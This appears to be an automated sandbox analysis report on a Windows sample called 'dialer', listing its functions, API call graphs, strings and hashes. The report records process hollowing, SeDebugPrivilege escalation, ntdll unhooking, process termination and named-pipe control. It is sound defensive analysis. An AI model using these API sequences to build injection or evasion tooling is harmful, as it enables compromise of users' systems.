                          • Instruction Fuzzy Hash: 84A002B1F1794096FA0BB7F7785E3DC21656B9CB82F500415B242472B2DD3C44558716

                          Non-executed Functions

                          Function 0000000140002560 Relevance: 47.5, APIs: 24, Strings: 3, Instructions: 296memoryregistryfileCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 184 140002560-14000258c 185 140002592 184->185 186 14000273a-140002742 184->186 187 1400026c6-1400026fe GetProcessHeap HeapAlloc K32EnumProcesses 185->187 188 140002598-14000259f 185->188 189 140002748-14000274b 186->189 190 14000297e-1400029a2 ReadFile 186->190 191 140002a74-140002a8e 187->191 193 140002704-140002715 187->193 194 1400025a5-1400025a8 188->194 195 1400026bd-1400026bf ExitProcess 188->195 196 140002751-140002756 189->196 197 140002974-140002979 call 14000175c 189->197 190->191 192 1400029a8-1400029af 190->192 192->191 201 1400029b5-1400029c9 call 1400018ac 192->201 193->191 202 14000271b-140002733 call 1400010c0 193->202 203 1400025ae-1400025b1 194->203 204 140002660-14000268b RegOpenKeyExW 194->204 198 140002919-14000292c call 140001944 196->198 199 14000275c-14000275f 196->199 197->191 198->191 226 140002932-140002941 call 140001944 198->226 205 140002761-140002766 199->205 206 14000279d-1400027ae call 140001944 199->206 201->191 224 1400029cf-1400029d5 201->224 227 140002735 202->227 213 140002651-14000265b 203->213 214 1400025b7-1400025ba 203->214 211 1400026a1-1400026b8 call 1400019c4 call 14000175c call 140001000 call 1400017ec 204->211 212 14000268d-14000269b RegDeleteValueW 204->212 205->191 215 14000276c-140002796 call 14000217c call 1400021a8 ExitProcess 205->215 206->191 235 1400027b4-1400027d6 ReadFile 206->235 211->191 212->211 213->191 221 140002644-14000264c 214->221 222 1400025c0-1400025c5 214->222 221->191 222->191 229 1400025cb-1400025ef ReadFile 222->229 233 1400029db-140002a16 GetProcessHeap HeapAlloc call 1400014d8 224->233 234 140002a5f 224->234 226->191 250 140002947-14000296f ShellExecuteW 226->250 227->191 229->191 231 1400025f5-1400025fc 229->231 231->191 238 140002602-140002616 call 1400018ac 231->238 253 140002a18-140002a1e 233->253 254 140002a49-140002a4f GetProcessHeap 233->254 240 140002a66-140002a6f call 140002a90 234->240 235->191 242 1400027dc-1400027e3 235->242 238->191 259 14000261c-140002622 238->259 240->191 242->191 249 1400027e9-140002827 GetProcessHeap HeapAlloc ReadFile 242->249 255 14000290b-140002914 GetProcessHeap 249->255 256 14000282d-140002839 249->256 250->191 253->254 260 140002a20-140002a32 253->260 257 140002a52-140002a5d HeapFree 254->257 255->257 256->255 261 14000283f-14000284b 256->261 257->191 263 140002624-140002633 call 1400010c0 259->263 264 140002638-14000263f 259->264 265 140002a34-140002a36 260->265 266 140002a38-140002a40 260->266 261->255 267 140002851-14000285c 261->267 263->191 264->240 265->266 271 140002a44 call 1400016cc 265->271 266->254 272 140002a42 266->272 268 140002881-140002905 lstrlenW GetProcessHeap HeapAlloc call 140002a90 GetProcessHeap HeapFree 267->268 269 14000285e-140002869 267->269 268->255 269->255 273 14000286f-14000287c call 140001c88 269->273 271->254 272->260 273->255
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000033.00000002.2215873737.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 00000033.00000002.2215827680.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000033.00000002.2215906208.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000033.00000002.2215945945.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_51_2_140000000_dialer.jbxd
                          Similarity
                          • API ID: Process$Open$File$CloseExitHandleHeapName$AllocDeleteEnumFindInformationModulePathProcessesQueryReadTokenValueWow64lstrlen
                          • String ID: SOFTWARE$dialerstager$open
                          • API String ID: 3276259517-3931493855
                          • Opcode ID: 3c799c4d4b717077f969037001029e391788172767dfb7e3a3364a0c1608c947
                          • Instruction ID: ae65b9042581f7dc9e2ee581e3d1b52dcddb088aa692a5b8ad70e1a65f9de3a1
                          • Opcode Fuzzy Hash: 3c799c4d4b717077f969037001029e391788172767dfb7e3a3364a0c1608c947
                          • Instruction Fuzzy Hash: 91D14DB13046818BEB7BDF26B8143E92269F74DBC8F404125BB4A47AB9DE78C605C741
                          Function 0000000140001C88 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 154injectionthreadmemoryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 280 140001c88-140001cb8 281 140001cbb-140001cc8 280->281 282 140001e8c-140001e91 281->282 283 140001cce-140001d25 CreateProcessW 281->283 282->281 286 140001e97 282->286 284 140001e88 283->284 285 140001d2b-140001d5a VirtualAllocEx 283->285 284->282 287 140001e5d-140001e60 285->287 288 140001d60-140001d7b WriteProcessMemory 285->288 289 140001e99-140001eb9 286->289 290 140001e62-140001e76 OpenProcess 287->290 291 140001e85 287->291 288->287 292 140001d81-140001d87 288->292 290->284 293 140001e78-140001e83 TerminateProcess 290->293 291->284 294 140001dd2-140001def VirtualAlloc 292->294 295 140001d89 292->295 293->284 294->287 296 140001df1-140001e07 GetThreadContext 294->296 297 140001d8c-140001dba WriteProcessMemory 295->297 296->287 299 140001e09-140001e2e WriteProcessMemory 296->299 297->287 298 140001dc0-140001dcc 297->298 298->297 300 140001dce 298->300 299->287 301 140001e30-140001e4c SetThreadContext 299->301 300->294 301->287 302 140001e4e-140001e5b ResumeThread 301->302 302->287 303 140001eba-140001ebf 302->303 303->289
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000033.00000002.2215873737.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 00000033.00000002.2215827680.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000033.00000002.2215906208.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000033.00000002.2215945945.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_51_2_140000000_dialer.jbxd
                          Similarity
                          • API ID: Process$MemoryThreadWrite$AllocContextVirtual$CreateOpenResumeTerminate
                          • String ID: @
                          • API String ID: 3462610200-2766056989
                          • Opcode ID: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
                          • Instruction ID: 5c16bc39e07cf5e776479c29415d8ab36f8b64b080a4e80c067f24e51f003d21
                          • Opcode Fuzzy Hash: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
                          • Instruction Fuzzy Hash: B55122B2700A808AEB52CF66E8447DE77A5FB88BD8F054125EF4997B68DF38C855C700
                          Function 00000001400019C4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 102memorycomCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000033.00000002.2215873737.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 00000033.00000002.2215827680.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000033.00000002.2215906208.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000033.00000002.2215945945.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_51_2_140000000_dialer.jbxd
                          Similarity
                          • API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
                          • String ID: dialersvc64
                          • API String ID: 4184240511-3881820561
                          • Opcode ID: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
                          • Instruction ID: f04b9e4fe08d72b668f3c34f73b3c63bb96ebc933f76805d9c48aa5d26f439e8
                          • Opcode Fuzzy Hash: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
                          • Instruction Fuzzy Hash: 69415A72704A819AE712CF6AE8543DD73B5FB89B89F044125EF4E47A64DF38D149C300
                          Function 0000000140001000 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 37registryCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000033.00000002.2215873737.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 00000033.00000002.2215827680.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000033.00000002.2215906208.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000033.00000002.2215945945.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_51_2_140000000_dialer.jbxd
                          Similarity
                          • API ID: Delete$CloseEnumOpen
                          • String ID: SOFTWARE\dialerconfig
                          • API String ID: 3013565938-461861421
                          • Opcode ID: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
                          • Instruction ID: 8f4ace04a6ff3505bb025a84b088d585f414f6eddbaae7ea6d4a7c6b6057ac94
                          • Opcode Fuzzy Hash: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
                          • Instruction Fuzzy Hash: 2F1186B2714A8486E762CF26F8557E92378F78C7D8F404215A74D0BAA8DF7CC248CB54
                          Function 0000000140002A90 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42fileCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000033.00000002.2215873737.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 00000033.00000002.2215827680.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000033.00000002.2215906208.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000033.00000002.2215945945.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_51_2_140000000_dialer.jbxd
                          Similarity
                          • API ID: File$Write$CloseCreateHandle
                          • String ID: \\.\pipe\dialercontrol_redirect64
                          • API String ID: 148219782-3440882674
                          • Opcode ID: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
                          • Instruction ID: c657f3a7a6ba8077c0f3fca19c98ae9a251d12aa6ce49f65425284bb78429f7a
                          • Opcode Fuzzy Hash: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
                          • Instruction Fuzzy Hash: AE1139B6720B5082EB16CF16F818399A764F78DFE4F544215AB6907BA4CF78C549CB40
                          Function 0000000140001914 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000033.00000002.2215873737.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 00000033.00000002.2215827680.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000033.00000002.2215906208.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000033.00000002.2215945945.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_51_2_140000000_dialer.jbxd
                          Similarity
                          • API ID: AddressHandleModuleProc
                          • String ID: ntdll.dll
                          • API String ID: 1646373207-2227199552
                          • Opcode ID: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
                          • Instruction ID: 7108e587e86fbdef38877cdd133235ae9a077454219746bc209a409130a8dfa8
                          • Opcode Fuzzy Hash: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
                          • Instruction Fuzzy Hash: 5BD0C9F471260582EE1BDBA378643E552996B5CBC5F884020AE164B360DA38C1998600

                          Execution Graph

                          Execution Coverage:18.4%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:0%
                          Total number of Nodes:214
                          Total number of Limit Nodes:5
                          execution_graph 436 140002524 437 140002531 436->437 438 140002539 436->438 440 1400010c0 437->440 478 1400018ac OpenProcess 440->478 443 1400014ba 443->438 444 140001122 OpenProcess 444->443 445 14000113e OpenProcess 444->445 446 140001161 K32GetModuleFileNameExW 445->446 447 1400011fd NtQueryInformationProcess 445->447 448 1400011aa CloseHandle 446->448 449 14000117a PathFindFileNameW lstrlenW 446->449 450 1400014b1 CloseHandle 447->450 451 140001224 447->451 448->447 453 1400011b8 448->453 449->448 452 140001197 StrCpyW 449->452 450->443 451->450 454 140001230 OpenProcessToken 451->454 452->448 453->447 456 1400011d8 StrCmpIW 453->456 454->450 455 14000124e GetTokenInformation 454->455 457 1400012f1 455->457 458 140001276 GetLastError 455->458 456->450 456->453 460 1400012f8 CloseHandle 457->460 458->457 459 140001281 LocalAlloc 458->459 459->457 461 140001297 GetTokenInformation 459->461 460->450 465 14000130c 460->465 462 1400012df 461->462 463 1400012bf GetSidSubAuthorityCount GetSidSubAuthority 461->463 464 1400012e6 LocalFree 462->464 463->464 464->460 465->450 466 14000139b StrStrA 465->466 467 1400013c3 465->467 466->465 468 1400013c8 466->468 467->450 468->450 469 1400013f3 VirtualAllocEx 468->469 469->450 470 140001420 WriteProcessMemory 469->470 470->450 471 14000143b 470->471 483 14000211c 471->483 479 14000110e 478->479 480 1400018d8 IsWow64Process 478->480 479->443 479->444 481 1400018f8 CloseHandle 480->481 482 1400018ea 480->482 481->479 482->481 486 140001914 GetModuleHandleA 483->486 487 140001934 GetProcAddress 486->487 488 14000193d 486->488 487->488 382 140002258 385 14000226c 382->385 409 140001f2c 385->409 388 140001f2c 14 API calls 389 14000228f GetCurrentProcessId OpenProcess 388->389 390 140002321 FindResourceExA 389->390 391 1400022af OpenProcessToken 389->391 394 140002341 SizeofResource 390->394 395 140002261 ExitProcess 390->395 392 1400022c3 LookupPrivilegeValueW 391->392 393 140002318 CloseHandle 391->393 392->393 396 1400022da AdjustTokenPrivileges 392->396 393->390 394->395 397 14000235a LoadResource 394->397 396->393 398 140002312 GetLastError 396->398 397->395 399 14000236e LockResource GetCurrentProcessId 397->399 398->393 423 1400017ec GetProcessHeap HeapAlloc 399->423 410 140001f35 StrCpyW StrCatW GetModuleHandleW 409->410 411 1400020ff 409->411 410->411 412 140001f86 GetCurrentProcess K32GetModuleInformation 410->412 411->388 413 1400020f6 FreeLibrary 412->413 414 140001fb6 CreateFileW 412->414 413->411 414->413 415 140001feb CreateFileMappingW 414->415 416 140002014 MapViewOfFile 415->416 417 1400020ed CloseHandle 415->417 418 1400020e4 CloseHandle 416->418 419 140002037 416->419 417->413 418->417 419->418 420 140002050 lstrcmpiA 419->420 422 14000208e 419->422 420->419 421 140002090 VirtualProtect VirtualProtect 420->421 421->418 422->418 429 1400014d8 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc K32EnumProcesses 423->429 425 140001885 GetProcessHeap HeapFree 426 140001830 426->425 427 140001851 OpenProcess 426->427 427->426 428 140001867 TerminateProcess CloseHandle 427->428 428->426 430 14000162f GetProcessHeap RtlFreeHeap GetProcessHeap HeapFree 429->430 433 140001565 429->433 430->426 431 14000157a OpenProcess 432 140001597 K32EnumProcessModules 431->432 431->433 432->433 434 14000161a CloseHandle 432->434 433->430 433->431 433->434 435 1400015c9 ReadProcessMemory 433->435 434->433 435->433 489 140002b38 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 490 140002b8e K32EnumProcesses 489->490 491 140002beb Sleep 490->491 492 140002ba3 490->492 491->490 492->491 493 140002bf8 494 140002c05 493->494 496 140002c25 ConnectNamedPipe 494->496 497 140002c1a Sleep 494->497 503 140001b54 AllocateAndInitializeSid 494->503 498 140002c83 Sleep 496->498 499 140002c34 ReadFile 496->499 497->494 501 140002c8e DisconnectNamedPipe 498->501 500 140002c57 WriteFile 499->500 499->501 500->501 501->496 504 140001bb1 SetEntriesInAclW 503->504 505 140001c6f 503->505 504->505 506 140001bf5 LocalAlloc 504->506 505->494 506->505 507 140001c09 InitializeSecurityDescriptor 506->507 507->505 508 140001c19 SetSecurityDescriptorDacl 507->508 508->505 509 140001c30 CreateNamedPipeW 508->509 509->505 510 140002540 511 140002558 510->511 512 14000254d 510->512 513 1400010c0 30 API calls 512->513 513->511 514 1400021d0 515 1400021dd 514->515 516 140001b54 6 API calls 515->516 517 1400021f2 Sleep 515->517 518 1400021fd ConnectNamedPipe 515->518 516->515 517->515 519 140002241 Sleep 518->519 520 14000220c ReadFile 518->520 521 14000224c DisconnectNamedPipe 519->521 520->521 522 14000222f 520->522 521->518 522->521 523 140002560 524 140002592 523->524 525 14000273a 523->525 526 1400026c6 GetProcessHeap HeapAlloc K32EnumProcesses 524->526 527 140002598 524->527 528 140002748 525->528 529 14000297e ReadFile 525->529 530 140002633 526->530 532 140002704 526->532 533 1400025a5 527->533 534 1400026bd ExitProcess 527->534 535 140002751 528->535 536 140002974 528->536 529->530 531 1400029a8 529->531 531->530 544 1400018ac 3 API calls 531->544 532->530 546 1400010c0 30 API calls 532->546 540 1400025ae 533->540 541 140002660 RegOpenKeyExW 533->541 537 140002919 535->537 538 14000275c 535->538 539 14000175c 22 API calls 536->539 545 140001944 ReadFile 537->545 542 140002761 538->542 543 14000279d 538->543 539->530 540->530 556 1400025cb ReadFile 540->556 547 1400026a1 541->547 548 14000268d RegDeleteValueW 541->548 542->530 605 14000217c 542->605 608 140001944 543->608 549 1400029c7 544->549 551 140002928 545->551 546->532 592 1400019c4 SysAllocString SysAllocString CoInitializeEx 547->592 548->547 549->530 560 1400029db GetProcessHeap HeapAlloc 549->560 561 140002638 549->561 551->530 563 140001944 ReadFile 551->563 555 1400026a6 600 14000175c GetProcessHeap HeapAlloc 555->600 556->530 558 1400025f5 556->558 558->530 570 1400018ac 3 API calls 558->570 566 1400014d8 13 API calls 560->566 572 140002a90 4 API calls 561->572 562 1400027b4 ReadFile 562->530 567 1400027dc 562->567 568 14000293f 563->568 583 140002a14 566->583 567->530 573 1400027e9 GetProcessHeap HeapAlloc ReadFile 567->573 568->530 574 140002947 ShellExecuteW 568->574 576 140002614 570->576 572->530 578 14000290b GetProcessHeap 573->578 579 14000282d 573->579 574->530 576->530 576->561 582 140002624 576->582 577 140002a49 GetProcessHeap 580 140002a52 HeapFree 577->580 578->580 579->578 584 140002881 lstrlenW GetProcessHeap HeapAlloc 579->584 585 14000285e 579->585 580->530 586 1400010c0 30 API calls 582->586 583->577 632 1400016cc 583->632 626 140002a90 CreateFileW 584->626 585->578 612 140001c88 585->612 586->530 593 140001a11 CoInitializeSecurity 592->593 594 140001b2c SysFreeString SysFreeString 592->594 595 140001a59 CoCreateInstance 593->595 596 140001a4d 593->596 594->555 597 140001b26 CoUninitialize 595->597 598 140001a88 VariantInit 595->598 596->595 596->597 597->594 599 140001ade 598->599 599->597 601 1400014d8 13 API calls 600->601 603 14000179a 601->603 602 1400017c8 GetProcessHeap HeapFree 603->602 604 1400016cc 5 API calls 603->604 604->603 606 140001914 2 API calls 605->606 607 140002191 606->607 609 140001968 ReadFile 608->609 610 14000198b 609->610 611 1400019a5 609->611 610->609 610->611 611->530 611->562 618 140001cbb 612->618 613 140001cce CreateProcessW 614 140001d2b VirtualAllocEx 613->614 613->618 616 140001d60 WriteProcessMemory 614->616 614->618 615 140001e97 615->578 616->618 617 140001e62 OpenProcess 617->618 619 140001e78 TerminateProcess 617->619 618->613 618->615 618->617 620 140001dd2 VirtualAlloc 618->620 622 140001d8c WriteProcessMemory 618->622 619->618 620->618 621 140001df1 GetThreadContext 620->621 621->618 623 140001e09 WriteProcessMemory 621->623 622->618 623->618 624 140001e30 SetThreadContext 623->624 624->618 625 140001e4e ResumeThread 624->625 625->615 625->618 627 1400028f7 GetProcessHeap HeapFree 626->627 628 140002ada WriteFile 626->628 627->578 629 140002b1c CloseHandle 628->629 630 140002afe 628->630 629->627 630->629 631 140002b02 WriteFile 630->631 631->629 633 140001745 632->633 634 1400016eb OpenProcess 632->634 633->577 634->633 635 140001703 634->635 636 14000211c 2 API calls 635->636 637 140001723 636->637 638 14000173c CloseHandle 637->638 639 140001731 CloseHandle 637->639 638->633 639->638

                          Callgraph

                          Executed Functions

                          Function 000000014000226C Relevance: 61.4, APIs: 27, Strings: 8, Instructions: 165registrymemorythreadCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000034.00000002.2189427707.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 00000034.00000002.2189357839.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000034.00000002.2189457407.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000034.00000002.2189497850.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_52_2_140000000_dialer.jbxd
                          Similarity
                          • API ID: CreateProcess$Close$CurrentHandleResource$FileSecurityThread$DescriptorFreeHeapModuleOpenProtectTokenValueVirtual$AdjustAllocConvertErrorFindInformationLastLibraryLoadLocalLockLookupMappingPrivilegePrivilegesSizeofSleepStringViewlstrcmpi
                          • String ID: D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$DLL$SOFTWARE\dialerconfig$SeDebugPrivilege$kernel32.dll$ntdll.dll$pid$svc64
                          • API String ID: 4177739653-1130149537
                          • Opcode ID: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
                          • Instruction ID: c2e61514e361dd61edc66d1a85693de1d2c237bf329a5b31df93bef4cff25afe
                          • Opcode Fuzzy Hash: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
                          • Instruction Fuzzy Hash: B781E4B6200B4196EB26CF62F8547D977A9F78CBD8F44512AEB4A43A78DF38C148C740
                          Function 00000001400014D8 Relevance: 19.6, APIs: 13, Instructions: 130memoryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          Memory Dump Source
                          • Source File: 00000034.00000002.2189427707.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 00000034.00000002.2189357839.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000034.00000002.2189457407.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000034.00000002.2189497850.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_52_2_140000000_dialer.jbxd
                          Similarity
                          • API ID: Heap$Process$AllocEnumFree$CloseHandleMemoryModulesOpenProcessesRead
                          • String ID:
                          • API String ID: 4084875642-0
                          • Opcode ID: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
                          • Instruction ID: 4858e5a3d965c592fcd1f5951e26bd94c88d4916acf90710a0b336d1aa1e032e
                          • Opcode Fuzzy Hash: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
                          • Instruction Fuzzy Hash: E6519DB2711A819AEB66CF63E8587EA22A5F78DBC4F444025EF4947764DF38C545C700
                          Function 0000000140001F2C Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 124filememorystringCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000034.00000002.2189427707.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 00000034.00000002.2189357839.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000034.00000002.2189457407.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000034.00000002.2189497850.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_52_2_140000000_dialer.jbxd
                          Similarity
                          • API ID: FileHandle$CloseCreateModuleProtectVirtual$CurrentFreeInformationLibraryMappingProcessViewlstrcmpi
                          • String ID: .text$C:\Windows\System32\
                          • API String ID: 2721474350-832442975
                          • Opcode ID: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
                          • Instruction ID: 0b364bd3c89a37fdd3fa7b369e4888cbeb1e5b170dc00cf86e963973e9165d3d
                          • Opcode Fuzzy Hash: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
                          • Instruction Fuzzy Hash: CC518BB2204B8096EB62CF16F8587DAB3A5F78CBD4F444525AF4A03B68DF38C549C700
                          Function 00000001400017EC Relevance: 9.1, APIs: 6, Instructions: 55memoryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          • GetProcessHeap.KERNEL32(?,00000000,?,000000014000238B,?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140001801
                          • HeapAlloc.KERNEL32(?,00000000,?,000000014000238B,?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140001812
                            • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000150B
                            • Part of subcall function 00000001400014D8: HeapAlloc.KERNEL32 ref: 000000014000151E
                            • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000152C
                            • Part of subcall function 00000001400014D8: HeapAlloc.KERNEL32 ref: 000000014000153D
                            • Part of subcall function 00000001400014D8: K32EnumProcesses.KERNEL32 ref: 0000000140001557
                            • Part of subcall function 00000001400014D8: OpenProcess.KERNEL32 ref: 0000000140001585
                            • Part of subcall function 00000001400014D8: K32EnumProcessModules.KERNEL32 ref: 00000001400015AA
                            • Part of subcall function 00000001400014D8: ReadProcessMemory.KERNELBASE ref: 00000001400015E1
                            • Part of subcall function 00000001400014D8: CloseHandle.KERNELBASE ref: 000000014000161D
                            • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000162F
                            • Part of subcall function 00000001400014D8: RtlFreeHeap.NTDLL ref: 000000014000163D
                            • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 0000000140001643
                            • Part of subcall function 00000001400014D8: HeapFree.KERNEL32 ref: 0000000140001651
                          • OpenProcess.KERNEL32 ref: 0000000140001859
                          • TerminateProcess.KERNEL32 ref: 000000014000186C
                          • CloseHandle.KERNEL32 ref: 0000000140001875
                          • GetProcessHeap.KERNEL32 ref: 0000000140001885
                          Memory Dump Source
                          • Source File: 00000034.00000002.2189427707.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 00000034.00000002.2189357839.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000034.00000002.2189457407.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000034.00000002.2189497850.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_52_2_140000000_dialer.jbxd
                          Similarity
                          • API ID: HeapProcess$Alloc$CloseEnumFreeHandleOpen$MemoryModulesProcessesReadTerminate
                          • String ID:
                          • API String ID: 1323846700-0
                          • Opcode ID: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
                          • Instruction ID: e8e8f15008253283e0d5a10c8ea57e573901c1344bffe788f1ea91b5e390c365
                          • Opcode Fuzzy Hash: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
                          • Instruction Fuzzy Hash: C8115BB1B05A4186FB1ADF27F8443D966A6ABCDBC4F188038EF09037B5DE38C5868700
                          Function 0000000140002258 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 67 140002258-14000225c call 14000226c 69 140002261-140002263 ExitProcess 67->69
                          APIs
                            • Part of subcall function 000000014000226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000228F
                            • Part of subcall function 000000014000226C: OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000229F
                            • Part of subcall function 000000014000226C: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 00000001400022B9
                            • Part of subcall function 000000014000226C: LookupPrivilegeValueW.ADVAPI32 ref: 00000001400022D0
                            • Part of subcall function 000000014000226C: AdjustTokenPrivileges.KERNELBASE ref: 0000000140002308
                            • Part of subcall function 000000014000226C: GetLastError.KERNEL32 ref: 0000000140002312
                            • Part of subcall function 000000014000226C: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000231B
                            • Part of subcall function 000000014000226C: FindResourceExA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000232F
                            • Part of subcall function 000000014000226C: SizeofResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140002346
                            • Part of subcall function 000000014000226C: LoadResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000235F
